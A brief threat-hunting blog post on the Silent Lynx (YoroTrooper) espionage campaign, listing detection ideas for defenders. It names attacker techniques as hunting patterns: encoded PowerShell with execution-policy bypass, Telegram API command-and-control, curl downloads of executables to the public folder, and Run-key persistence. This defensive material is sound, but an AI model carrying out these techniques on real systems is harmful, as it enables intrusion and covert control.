025. Silent Lynx Campaign: Detection Opportunities
Hello everyone! Today we're going to talk about an activity cluster, which researches from Seqrite named Silent Lynx. It's also known as YoroTrooper and SturgeonPhisher, and according to Cisco Talos has Khazakhstan origin. BI.ZONE Threat Intelligence team tracks this cluster under the name Cavalry Werewolf.
Seqrite researchers uncovered two campaigns:
- RAR archives with malicious ISO files. These files contained decoy documents and C++ loaders.
- RAR archives with decoy documents and Golang reverse-shell.
As always, let's look at detection and hunting opportunities. First, ISO files are usually very small, and it's not common:
- Look for small ISO files with executable contents
- Look for small ISO files in Downloads, Documents and Desktop folders
Next thing, the loader used PowerShell to communicate with Telegram API, receive and run commands, and send back the output or errors:
- Look for PowerShell execution with -NoProfile -ExecutionPolicy Bypass -e and long Base64 encoded strings as arguments
- Look for PowerShell communications with api[.]telegram[.]org
The adversary leveraged curl.exe to download additional payloads to the compromised system:
- Look for cmd /c curl -o execution for downloading executables to %PUBLIC% folder
The threat actors also modified registry to acheive persistence:
- Look for reg add or reg query executions related to HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key
See you tomorrow!
Comments
Post a Comment